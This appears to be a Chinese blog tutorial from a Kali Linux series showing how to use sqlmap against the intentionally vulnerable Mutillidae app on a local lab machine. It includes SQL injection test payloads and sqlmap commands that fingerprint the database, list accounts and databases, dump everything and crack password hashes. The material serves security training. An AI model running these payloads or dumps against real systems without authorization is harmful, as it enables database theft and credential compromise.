Kali Linux Web渗透:Mutillidae SQL注入漏洞“注入工具:SQLMAP“(42)

SQLMAP是一款专业的针对SQL注入漏洞的工具。软件可以自动化,比手工简单多了。

 

SQLMAP漏洞检测技术:

1、基于布尔的盲注检测:' and 1=1 'and 1=2等

2、基于时间的盲注检测:' and (select * from (select(sleep(20)))a) --

3、基于错误的盲注检测:比如输入单引号报错

4、基于联合查询的检测:取决于开发者是否使用循环语句,如果使用,才可以查出多条信息

5、基于堆叠查询的检测:分号分隔SQL语句

 

SQLMAP支持几乎所有主流的数据库,例如:支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB,Informix,HSQLDB和H2数据库管理系统,但不包含NoSQL。

 

这次演示示例先不采用DVWA,因为登陆DVWA需要身份认证,具体身份认证的方法在后面介绍。

使用Metaploitable2的Mutillidae:

首先,要处理数据库的问题,这里是Mutillidar数据库有问题:Mutillidae SQL注入漏洞

 

找到$dbname变量,更改一下就可以了:Mutillidae SQL注入漏洞

 

http://192.168.232.129/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details

使用SQLMAP对上面这个网址进行检测

命令:

sqlmap -u "http://192.168.232.129/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p username -f

解析:-u输入猜测存在注入的URL,-p猜测存在注入的参数,-f使用指纹信息

结果如下:SQLMAP

 

基于错误,基于时间,基于联合查询判断出存在注入而且数据库为MySQL

指纹信息如下:sqlmap

得知目标系统的语言和Web服务器,数据库版本等关键信息。

 

这条命令最后的参数其实可以不用-f,我们可以使用其他的参数:

比如--users:查询目标数据库账号sqlmap

 

比如--banner:获取banner信息,其实和上面结果差不多

sqlmap

 

再比如--dbs:目标数据库中有哪些库

这里查到7个库sqlmap

 

还有--schema:查看元数据库

数据过多,我这里只展示其中一部分的数据库

sqlmap

 

最后一个参数-a:查看所有信息sqlmap

 

没有结束,sqlmap接下来提示我们发现了哈希值,是否需要继续破解下去

我选择是,它会将哈希值存入一个本地文件中,并且允许sqlmap进行进一步的破解

使用默认字典,不适用密码前缀sqlmap

 

由于我们使用的是-a参数,最终破解出了所有的数据库信息和带有哈希的密文。

 

我们可以用sqlmap作为客户端直接连接目标数据库:

执行命令:

sqlmap -d "mysql://root:@192.168.232.129:3306/dvwa" -f --users

结果很快就可以出来,其他参数和上边提到的一样,都可以做到相关的操作,但是速度要比上面快得多

 

注入多个URL:

执行命令:

sqlmap -m list.txt --users

将多个URL存入list.txt,然后注入,后边的参数很前面提到的一样

 

以上的方式都是采用GET方式提交的URL,如果是采用POST方式提交的URL呢?

这里就需要结合Burpsuite工具了

找一个需要POST方法提交表单的注入URL:

http://192.168.232.129/mutillidae/index.php?page=login.php

使用Burp截获HTTP请求:Burp

存入一个文本post.txt

 

然后就可以执行了:

命令:后边的参数还是可选的那些

sqlmap -r post.txt --users

 

第二种方式:

使用Burp的log文件:

首先我们到Burp的设置中配置Log:

Burpsuite

 

然后使用命令:

sqlmap -l log.txt -p username

后面参数还是类似的,就可以对日志中的requests信息进行检测了

 

基于HTTPS的检测:

其实很简单,只需要加一个参数--force-ssl

 

扫描配置文件:

sqlmap -c config.txt

由于配置文件的参数过多,所以具体的使用方法就不多说了。

可以来看看sqlmap的默认的配置文件:

查询位置,然后进入/etc/sqlmap/sqlmap.conf查看sqlmap.conf

 

后边内容就是围绕这个配置文件中的其他参数进行讲解,暂时就不多说了。

    A+
发布日期:2019年11月20日 21:18:52  所属分类:Kali Linux 新手教程
最后更新时间:2019-11-20 21:19:11
评分: (1 票;平均数5.00 ;最高评分 5 ;用户总数1;总得分 5;百分比100.00)
头像
刷流量 刷人气 刷点击 刷收藏 刷APP关键词
刷流量 刷人气 刷点击 刷收藏 刷APP关键词
  • ¥ 1.0元
  • 市场价:9.9元
SEO顾问 中小型网站 单站最低99.9元 全方位优化
SEO顾问 中小型网站 单站最低99.9元 全方位优化
  • ¥ 99.9元
  • 市场价:5000元
wordpress站群服务 泛解析二级域名 二级目录站群
wordpress站群服务 泛解析二级域名 二级目录站群
  • ¥ 1999.9元
  • 市场价:4800元
免费SSL证书 HTTPS申请 安装 配置 支持通配符*
免费SSL证书 HTTPS申请 安装 配置 支持通配符*
  • ¥ 199.9元
  • 市场价:20000元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: